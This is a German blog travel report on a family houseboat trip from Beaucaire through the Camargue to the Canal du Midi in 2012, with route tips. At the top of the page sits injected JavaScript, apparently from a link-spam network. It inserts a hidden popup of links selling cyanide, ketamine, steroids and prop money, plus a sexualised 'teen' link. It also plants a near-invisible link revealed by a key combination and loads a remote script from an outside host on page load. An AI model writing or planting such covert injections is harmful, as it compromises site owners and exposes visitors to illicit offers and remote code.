(function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
where to buy potassium cyanide in the philippines<\/a> <\/div>
worldclasschemicals.com<\/span> <\/div> <\/div>
\u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0434\u043b\u044f \u043b\u0435\u0441\u0442\u043d\u0438\u0447\u043d\u044b\u0445 \u043e\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0439<\/a> <\/div>
lestnicy.com.ua<\/span> <\/div> <\/div> <\/div>
ketalar ketamine hydrochloride powder<\/a> <\/div>
www.loyal-pharmacist.com<\/span> <\/div> <\/div>
l carnitine 2000 \u043a\u0430\u043a \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c<\/a> <\/div>
massfactor.com.ua<\/span> <\/div> <\/div> <\/div>
vitamina b12 b6 e zinco<\/a> <\/div>
www.densityplus.com<\/span> <\/div> <\/div>
\u043c\u043e\u0434\u043d\u0430\u044f \u043e\u0434\u0435\u0436\u0434\u0430 \u0434\u043b\u044f \u043f\u043e\u043b\u043d\u044b\u0445 \u0442\u0440\u0438\u043a\u043e\u0442\u0430\u0436<\/a> <\/div>
parishop.com.ua<\/span> <\/div> <\/div> <\/div>
purchase human hair<\/a> <\/div>
amadshair.com<\/span> <\/div> <\/div>
uygun tur paketleri<\/a> <\/div>
www.tatiltur.com<\/span> <\/div> <\/div> <\/div>
\u043f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u0442\u043e\u0432\u0430\u0440\u043e\u0432 \u043d\u0430 \u0437\u0430\u043a\u0430\u0437<\/a> <\/div>
goldschmidt.com.ua<\/span> <\/div> <\/div>
teen sex mykonos<\/a> <\/div>
mykonosgirls.com<\/span> <\/div> <\/div> <\/div>
stadium 2 copd<\/a> <\/div>
elethosszig.hu<\/span> <\/div> <\/div>
buy steriod<\/a> <\/div>
www.anabolicstebody.com<\/span> <\/div> <\/div> <\/div>
\u043a\u0443\u0440\u0441\u044b \u0432\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u043a\u0438\u0435\u0432\u0435<\/a> <\/div>
just-avto.kiev.ua<\/span> <\/div> <\/div>
australian prop money for sale<\/a> <\/div>
infinite-dollar.com<\/span> <\/div> <\/div> <\/div>
\u0430\u043a\u043a\u0443\u043c\u0443\u043b\u044f\u0442\u043e\u0440\u044b + \u0434\u043b\u044f \u0448\u0443\u0440\u0443\u043f\u043e\u0432\u0435\u0440\u0442\u043e\u0432 kress<\/a> <\/div>
wellmark.com.ua<\/span> <\/div> <\/div>
crossfit resistance bands workout<\/a> <\/div>
uk.starwoodsports.com<\/span> <\/div> <\/div> <\/div>
christian church in westchester ny<\/a> <\/div>
seekersnyc.org<\/span> <\/div> <\/div>
bad credit financing for dental implants<\/a> <\/div>
www.acefamilydental.com<\/span> <\/div> <\/div> <\/div>
evga supernova 1300 g2 80plus gold power supply<\/a> <\/div>
fateka.com<\/span> <\/div> <\/div>
\u0e27\u0e34\u0e18\u0e35 \u0e43\u0e0a\u0e49 \u0e2a\u0e39\u0e15\u0e23 \u0e1a\u0e32 \u0e04\u0e32 \u0e23\u0e48\u0e32 excel<\/a> <\/div>
sagaming168.com<\/span> <\/div> <\/div> <\/div>
\u0420\u043e\u043c \u0413\u0440\u0430\u0431\u043e\u0432\u0435\u0446<\/a> <\/div>
luxgradus.com.ua<\/span> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div> <\/div>
rehvid<\/a> <\/div>
fs.ee<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} })();
5.12.2013

Hausbootfahrt ab Beaucaire

Reisebericht Hausbootfahrt ab Beaucaire im Gebiet Südfrankreich/Camargue

Boot: Royal Mystique NEW

Termin: 2.6.-10.6.2012

Um 7.30 Uhr fahren wir mit vollgepacktem Auto in Richtung Südfrankreich. Das Thermometer zeigt zuhause 12 ° C, wir freuen uns schon auf die heiße Camargue! Wir fahren über Freiburg, die A 5 Richtung Basel und dann nach Frankreich rein. Bis Lyon ist die Fahrt flüssig. Nach einem kurzen Stau südlich von Lyon beschließen wir, eine Mittagspause einzulegen. In dem von den Kindern mit lautem Jubel ausgewählten Mc Donalds dürfen wir lernen, dass in anderen Ländern auch andere Sitten herrschen… Am Eingang gibt es einen Bildschirm, an dem man in fünf verschiedenen Sprachen seine Bestellung eintippen kann. Diese wird dann – nach Eingabe der Kreditkarte und der passenden PIN-Nummer – an die Küche gesendet. Mit dem Bon, den dieser Automat ausgibt, kann man dann an einer Spezialkasse seine Bestellung abholen. Leider ist die Auswahl der Burger nicht identisch mit der in Deutschland. Mein Versuch, ein „Royal Deluxe“, schmeckt mit nicht, da scharfer Senf für meinem Geschmack nicht in einen Burger gehört…

Nachdem alle mehr oder weniger satt und zufrieden sind, fahren wir weiter. Die Umgebung wird immer mediterraner und auch immer wärmer: bei Valence sind es 33,5 ° C auf der Außentemperaturanzeige!

Pünktlich um 16 Uhr erreichen wir Beaucaire. Die Wegbeschreibung von Le Boat erwähnt nur einen Kreisverkehr, wir durchfahren jedoch mindesten fünf Kreisel, bevor wir dann die beschriebene Brücke überqueren. Nach der Brücke muss man sofort scharf rechts abbiegen und das kleine Schild „Le Boat“ suchen, das dort am Haus angebracht ist. Die Zufahrt zum Hafen ist sehr eng und nur von jeweils einem Auto zu befahren. Das Büro ist modern und der Empfang durch den Basisleiter Bob und seine Frau sehr herzlich. Die beiden sprechen englisch und die gesamte Abwicklung ist unkompliziert und sehr freundlich. Die Kinder erhalten ihre Schwimmwesten und Bob geht mit uns sofort zu „unserem“ Boot. Wir laden alles vom Auto aus Boot und parken den PKW auf Empfehlung von Bob im abgeschlossenen Gelände. Nach der Einweisung in das Boot gibt es eine kurze Probefahrt, auf der Bob uns eine neue Technik der Steuerung zeigt: wir sollen rückwärts unter der Brücke neben dem Hafen fahren, als Steuerung nur das Bugstrahlruder. Es klappt alles gut und Bob ist zufrieden mit uns. Um die einzige Schleuse, die zwischen Beaucaire und dem Etang de Thau liegt, noch zu schaffen, empfiehlt uns Bob, innerhalb der nächsten fünf Minuten loszufahren. Wir starten kurz darauf auch und hoffen, die Schleuse von Nourrignier in 6 km noch zu erreichen, bevor diese schließt.

Die Strecke ist schnurgerade, zu Beginn ist auf der rechten Seite ein unschönes Industriegebäude zu sehen und zu hören. Rechts und links des Kanals sind Wiesen, Felder und auch vereinzelte Häuser zu sehen. Der begleitende Treidelpfad ist ein ziemlich zugewachsener Feldweg, der zum Radfahren nicht gerade einlädt.

Als wir bei der Schleuse ankommen ist diese zwar in Betrieb, aber nicht vorbereitet für uns. Matthias springt an Land und geht ins Schleusenhäuschen. Die Schleuse schließt sich und beginnt sich zu füllen. Es ist fünf Minuten vor 19 Uhr und wir freuen uns schon, dass wir es wohl doch noch schaffen, die Schleuse zu passieren. Eine Nicols 1010 kommt mit und wir machen beide Boote in der Schleuse fest. Als der Kapitän der Nicols jedoch mit enttäuschtem Gesicht aus dem Schleusenhäuschen kommt, ahnen wir, dass wir wohl doch hier schlafen werden.

Nach einer sehr ruhigen Nacht fahren wir gemeinsam mit der Nicols 1010 gegen 8.30 Uhr in die Schleuse ein. Der Kanal ist an beiden Seiten sehr bewachsen und wir sehen zum ersten Mal ein Pferd und einen Esel am Ufer grasen. Nach 5 km erreichen wir Bellegarde. Der Hafen ist voller Boote und insgesamt nicht so idyllisch, wir der Name vermuten lässt. Kurz nach Bellegarde beginnt es ein bisschen zu regnen und wir verlegen die Fahrt nach drinnen. Nach einiger Zeit sehen wir auf der linken Seite – hinter den Bäumen schwer zu erkennen – drei Reiter, die auf einem großen Feld eine große Herde Rinder treiben. Dieses beeindruckende Schauspiel lassen wir uns nicht entgehen, legen an und gehen an Land. Leider wird der Regen nun stärker und die Reiter beenden ihre Arbeit. Auch wie setzen somit unsere Reise fort.

Wir kommen in St. Gilles vorbei, ein weiterer Hafen von Le Boat. Hier gibt es einige Restaurants und auch eine belebte Einkaufsstrasse ist vom Boot aus zu sehen. Unser nächstes Ziel ist Aigues Mortes. Das Hafenbecken ist sehr groß, jedoch das meiste ist von Touristenbooten belegt, die eine Fahrt in die Camargue und zu den Reitern bietet, die wir am Vormittag gesehen haben. Auf Anfrage dürfen wir kostenlos anlegen, da das nächste Ausflugsschiff erst in 2 Stunden wiederkommt. Wir gehen an Land uns bewundern das herrliche Karussell. Momentan ist keiner zu sehen, bei dem man Karten dafür kaufen könnte. Deshalb beschließen wir, durch das große Tor der Stadtmauer in die dahinter liegende Einkaufsstraße zu gehen. Ein Geschäft reiht sich an das nächste, es ist touristisch sehr erschlossen, jedoch durch die kleinen Gassen mit den mittelalterlichen Mauern besonders sehenswert. Die Strasse, die wir gewählt haben, führt uns direkt auf einen größeren Platz, auf dem die Statue des Heiligen Ludwigs steht. Überall sind Restaurants und Cafes, die zum Verweilen einladen. Wir besichtigen die Kirche und kaufen anschließend noch ein paar Souvenirs. Die Stadtmauer kann man nur nach Bezahlung erklimmen. Um rechtzeitig unseren Liegeplatz für das Ausflugsschiff zu räumen gehen wir zurück zum Boot. Während Matthias sicherheitshalber ablegt und mit dem Boot im Hafenbecken schippert, möchten die Kinder nun endlich eine Runde mit dem Karussell fahren. Es ist ein alters, zweistöckiges Karussell mit Kutschen, Pferden und Schaukeln sowie vielen Lichtern. Sogar einige ältere Damen fühlen sich sehr davon angezogen und fahren ebenfalls mit.

Nach dieser Fahrt steigen wir zu Matthias und unseren Hunden wieder aufs Boot. Auf unserem Weg Richtung Carnon kommen wir nun immer näher ans Meer, was man mittlerweile sogar riechen kann: es duftet nach Salz und Muscheln. In Carnon biegen wir rechts in den Hafen Perols ein und gehen in Richtung Stadtmitte. Ein Supermarkt und eine Tankstelle sind in ca. 1 km vom Hafen entfernt. Der Weg dorthin führt über eine dicht befahrene Straße und ist nicht sehr angenehm. Wir besichtigen den Hafen mit seinen Restaurants und Geschäften: alles ist sehr touristisch angelegt und zeigt uns wieder, wie schön es doch in Aigues Mortes war…

Wir versuchen, uns durch die Hochhäuser zum Strand zu navigieren, irren aber nur durch die Strassen ohne einen Hinweis oder einen Weg dorthin zu finden. Entnervt geben wir auf und laufen zurück zu unserem Boot. Wir fahren noch ein wenig weiter bis nach Palavas-les Flots und übernachten kostenlos am Kanal.

Das Wetter am nächsten Tag ist super: Sonnenschein, blauer Himmel und kaum ein Lüftchen weht. Beste Voraussetzungen, um den Etang de Thau zu überqueren. Nach einem gemütlichen Frühstück fahren wir los. Auf der linken Seite sehen wir einen Hügel mit einer Kirche, die Kathedrale von Maguelonne. Dort treffen wir auf eine Brücke direkt auf dem Wasser. Was nun? Doch bevor wir überlegen können, was zu tun wäre, öffnet sich diese Brücke seitlich und wir können passieren.

In Frontignan reihen wir uns in die Schlange von Booten ein, die auf die Öffnung der Hebebrücke warten. Diese öffnet zweimal am Tag: morgens um 8.30 Uhr und nachmittags um 16 Uhr. Nach ca. 5 km erreichen wir den Etang de Thau. Zu Beginn sehen wir die roten und grünen Stangen im See, welche die Fahrrinne markieren, noch sehr gut. Auf der linken Seite liegt Sete. Da für die Einfahrt in diese Stadt jedoch eine telefonische Anmeldung beim Brückenpersonal erforderlich ist, beschließen wir weiterzufahren. Als nächstes nehmen wir Kurs auf den gelben Leuchtturm von Bouzigues. Der See ist wundervoll ruhig, die Sonne scheint heiß und wir halten an, um die Aussicht zu genießen. Matthias zieht seine Badehose an und springt ins frische Nass. Unser Labrador Sandy hat auch Lust auf eine Erfrischung und springt hinterher.

Nach dieser Abkühlung kann die Fahrt weitergehen.

In der Wasserkarte ist eingezeichnet, dass als nächstes wieder eine rote und eine grüne Stange im Wasser anzuvisieren sind. Trotz unseres mitgebrachten Fernglases sehen wir diese Stangen jedoch nicht… Da unser Boot sich durch die Rast gedreht hat, wird es zusätzlich schwer, den Kurs korrekt fortzusetzen. Wir entschließen uns dazu, uns an den Austernbänken zu orientieren und fahren weiter. Bald sehen wir die Stangen und suchen wieder die nächsten. So hangeln wir uns über den See und fahren am Ende kurz nach Marseillan ein. Der kleine Hafen sieht ganz nett aus, ist jedoch komplett belegt. Daher fahren wir weiter und erreichen die Einfahrt zum Canal du Midi. Diese hatte ich mit spektakulärer vorgestellt: auf den ersten Metern liegen kleine Boote, zum Teil bereits gesunken und vergammelt. Mehrmals frage ich Matthias, ob er die richtige Einfahrt genommen hat… Er bestätigt mir jedoch immer wieder, dass wir schon auf dem richtigen Weg seien und bald erreichen wir die erste Schleuse, die auch laut Wasserkarte kommen müsste.

Der Kanal schlängelt sich durch die Landschaft und ist von Bäumen gesäumt. Für diese Fahrt durch die Alleen ist der Canal du Midi berühmt und wir genießen den kühlen Schatten.

In Agde müssen wir vor der Rundschleuse anlegen und mein Schleusenwärter nachfragen, wann geöffnet wird. Er sagt uns, dass wir mit ca. 30 Minuten Wartezeit rechnen müssen. Wir nutzen die Zeit, um bei der Schleusung zweier Touristendampfer zuzusehen und uns beim Verkaufsstand neben der Schleuse mit frischem Obst und Gemüse einzudecken.

Als nächstes Ziel haben wir uns Vias ausgesucht. Wir machen vor der ersten Schleuse fest und erkunden mit dem Fahrrad die Gegend. Hinter der Brücke, direkt am Kanal, ist ein Freizeitpark mit Achterbahn und Wildwasserbahn, der aber wohl nur abends geöffnet ist. Ein kleines Stückchen dahinter ist eine Outdoor-Kartbahn. Die Bedingungen für die Anmietung sind feste Kleidung und feste Schuhe, auch größere Kinder dürfen fahren.  Anschließend an die Fahrt erhält der Fahrer seine Rundezeiten auf einem Blatt Papier ausgehändigt mit dem Hinweis, dass er „sehr schnell“ war! Unweit der Kartbahn ist ein Minigolfplatz und ein Indoor-Funpark. Dazwischen entdecke ich ein Schild mit dem Hinweis, dass sich hinter dem Minigolfplatz eine Pferderanch befindet, die Ausritte zum Strand anbietet. Genau das, was wir gesucht haben! Um 18 Uhr findet der nächste Ritt statt und wir melden Selina und mich dafür an. Wir fahren zum Boot und ziehen uns um. Matthias und Alia wollen in der Zeit zum Strand gehen.

Der Ausritt beginnt im ruhigen Schritt mit einer großen Gruppe von Leuten. Einige sitzen das erste Mal auf einem Pferd, andere sind schon „Profis“. Wir reiten am Kanal entlang bis wir nach einiger Zeit Richtung Strand abbiegen. Die Wellen rauschen, der Strandabschnitt ist menschenleer und wir reiten am Meeresrand entlang. Herrlich! Hinter einer großen Düne halten wir an und alle, die nicht galoppieren möchten, sollen absteigen. Wir anderen reiten wieder zum Strand zurück und auf das Kommando unseres Berittführers geben wir alle Vollgas! Wir preschen über den Strand und genießen dieses unbeschreibliche Gefühl von Freiheit und Abenteuer!

Am Ende des Strandes kehren alle um und zurück geht die wilde Jagd, zurück zu den anderen Reitern, die neben „ihren“ Pferden auf uns warten. Es hat uns sehr viel Spaß gemacht, für ungeübte oder ängstliche Reiter sowie Kinder ist es eigentlich nicht zu empfehlen (Selina ist zuvor noch nie so schnell galoppiert, fand es aber erstaunlicherweise trotzdem nicht beängstigend…).

Nachdem wir wieder an der Ranch angekommen sind, geben wir die Pferde zurück und fahren mit den Fahrrädern zum Boot zurück. Übernachten möchten wir heute in Port Cassafieres, einem Hafen von Le Boat.

Am nächsten Morgen kaufen wir Baguette und Croissants beim hinter dem Hafen liegenden  Campingplatz „Les Mimomas“ ein. Nach dem Frühstück fahren wir nach Portiragnes-Plages (dort gibt es u.a. einen SPAR-Markt zum Einkaufen, der jedoch sehr teuer ist!) und legen einen Strandtag ein. Die Kinder sammeln Muscheln, es gibt unzählige davon: wunderschöne große Muscheln, von denen viele in der Spitze ein kleines Loch haben. Die Kinder möchten sich zuhause eine Muschelkette daraus machen. Sie bauen eine Sandburg und laufen durch die Wellen.  Am Nachmittag essen wir noch ein Eis vom Verkaufswagen am Strandparkplatz und radeln dann zurück zum Boot. Heute möchte Alia reiten und ich gehe mit ihr zu einer weiteren Ranch ca. 500 m vom Hafen entfernt. Dort kann man Ponies „mieten“ und mit ihnen für EUR 6,- je halbe Stunde spazieren gehen. Alia hat viel Spaß auf ihrem Minipony, das „Pinguin“ heißt.

Am nächsten Tag machen wir uns auf den Rückweg nach Beaucaire. Die Dame in der Rezeption im Hafen von Port Cassafieres sagt uns, dass heute das Wetter für die Überquerung des Etang de Thau nicht geeignet sei. Wir sollen aber sicherheitshalber im Hafenamt von Marseillan anrufen. Der Hafenmeister sagt uns, es sei kein Problem und somit machen wir uns auf den Weg.

Als wir den Etang erreichen ist es windiger geworden. Wir fahren das erste Stück bis Marseillan und dort in den Hafen, da es nach Gewitter aussieht. Im Hafen ist noch ein Platz frei, wir machen dort fest und bezahlen stolze EUR 39,- für eine Nacht! Wir bekommen eine Rechnung ausgehändigt, auf der ein Code für die Benutzung der Duschen und WC im Hafen steht (in den Häfen und auf dem Etang ist die Benutzung der Nasszellen an Bord ja verboten).
Die Promenade hat einige Restaurants und auch ein paar kleinere Souvenirläden. Auch hier gibt es einen Sparmarkt.

Nach einem Bummel durch die Läden gehen wir in die Pizzeria „La Rive Droite“. Die Auswahl der Speisen ist wieder sehr ungewöhnlich: es gibt neben den traditionellen Pizzen auch Pizza mit Schafskäse, Senf und Würstchen…
Unser Essen schmeckt gut und so machen wir uns satt und zufrieden auf den Weg zum Boot. Es fängt an zu regnen und ein Gewitter zieht auf.

Für den nächsten Tag haben wir geplant, noch einmal den Strand bei Palavas zu besuchen sowie abends in Aigues Mortes anzulegen. Dafür müssen wir um ca. 5.30 in Marseillan starten, um die Hebebrücke in Frontignan um 8.30 Uhr zu passieren.

Die Überquerung des Etangs bei Sonnenaufgang ist sehr idyllisch! Wir schaffen es, pünktlich in Frontignan zu sein und halten an der Anlegestelle auf Höhe der Kathedrale von Maguelonnes. Mit den Rädern befahren wir die Halbinsel und bald erreichen wir das Meer. Es ist herrlich hier! Ein feiner Sandstrand, sauber du mit einem Blick bis Palavas. Unser Hund genießt die Wellen, die Kinder spielen im Sand und wir genießen das Meeresrauschen.

Nach dieser Rast am Meer fahren wir mit den Rädern zur Kathedrale. Er ist ein schönes altes Gebäude mit zwei Ebenen, die man besichtigen kann. Die Geschichte der Kirche ist am Eingang auf Tafeln zu lesen, jedoch nur auf Französisch.

Kurzübersicht Etappenempfehlung:

- St. Gilles (Restaurants am Hafen, kostenlos für Le Boat-Kunden (auch Frischwasser und Strom!)

- Aigues Mortes (Einkaufen, Besichtigen, Fahrt zu den Camargue-Reitern)

- Kathedrale von Maguelonne (Anlegen am Steg kostenlos möglich, sehr schöner Strand)

- Frontignan (Einkaufen, kostenloses Anlegen): ACHTUNG: die Brücke öffnet sich nur 2mal täglich: 8.30 Uhr und 16 Uhr! Außerhalb dieser Zeiten ist keine Weiterfahrt möglich!

- Etang de Thau (Baden)

- Agde (Rundschleuse, neben der Schleuse ist ein Stand mit frischem Obst und Gemüse)

- Vias (Kartbahn, Freizeitpark, Ranch mit Ausritten zum Strand – vorreservieren!, Touristenort Vias-Plage mit vielen Läden und guten Restaurant-Empfehlung: Mexikaner auf der rechten Seite, Name unbekannt, Foto anbei J)

- Port Cassafieres (Hafen von Le Boat, Campingplatz „Les Mimomas“, Ranch in ca. 5 Minuten Entfernung

- Portiragnes-Plages (Touristenort, Baden, Einkaufen)

ÜBERSICHT ALLER BUCHBAREN BOOTE AB BEAUCAIRE – hier klicken

Kategorien